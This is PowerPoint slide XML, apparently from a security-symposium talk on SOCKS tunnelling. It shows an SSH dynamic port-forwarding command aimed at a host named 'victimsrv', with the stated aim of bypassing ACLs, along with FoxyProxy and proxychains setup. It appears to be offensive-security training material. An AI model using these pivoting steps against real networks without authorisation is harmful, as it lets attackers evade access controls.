                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security Symposium</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Tool to forward TCP and UDP (SOCKS5) traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4378DC07-674E-470E-A5A4-A03AB0CEEE9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339313" y="0"/>
            <a:ext cx="4451425" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42737542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7A5E6A-D01F-4643-81A2-8C466A518B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="0"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH SOCKS Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC56BF9-9346-4AD4-B01C-849CD894E0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568491" y="1775330"/>
            <a:ext cx="9562098" cy="3018262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># Use remote server as SOCKS proxy via SSH connection to bypass ACL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -v -D 8080 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serveradmin@victimsrv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-v verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-D 8080 local “dynamic” application-level port forwarding (SOCKS4/SOCKS4 supported)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;=1024 are privileged ports, need root access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Higher ports, non-root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> key based authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-N do not execute a remote command, just establish SOCKS proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18778891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306CEB-CE60-4FBC-88D5-79E3A9300D73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863851" y="108284"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{351AB133-3F19-44B5-960B-FA653BAE315B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496302" y="1708484"/>
            <a:ext cx="6093994" cy="375552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>foxyproxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> extension</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, text, application, chat or text message, website&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41D4E6D-F8B9-4483-A70A-80E4909D36A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50787" y="2162110"/>
            <a:ext cx="8217276" cy="4090202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19637505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21560-4A57-4850-BE61-B0FABDD3C640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E15041-010A-4C7A-B18E-8C18E3BDFE7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801978" y="457200"/>
            <a:ext cx="6605338" cy="6043038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38941762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24F6B-093B-45C4-A29F-4CF690E41963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3D80E7-98C0-498A-9ABB-A0B467979E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0ADE932-8194-4E40-945D-EE92627C21EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/haad/proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installed in Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32747686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24F6B-093B-45C4-A29F-4CF690E41963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466809" y="275639"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0ADE932-8194-4E40-945D-EE92627C21EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484366" y="2370221"/>
            <a:ext cx="3932237" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Config File: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/proxychains4.conf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9BA345D-2A0E-424A-89D9-8A0534BD1465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="501924" y="2739431"/>
            <a:ext cx="3897122" cy="1778686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9FF6BCE-42C0-43C2-BE7F-F72BA5B075F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871350" y="2782725"/>
            <a:ext cx="6999481" cy="1292549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6E1DDBB-113C-4655-A45D-22A33A0F8345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
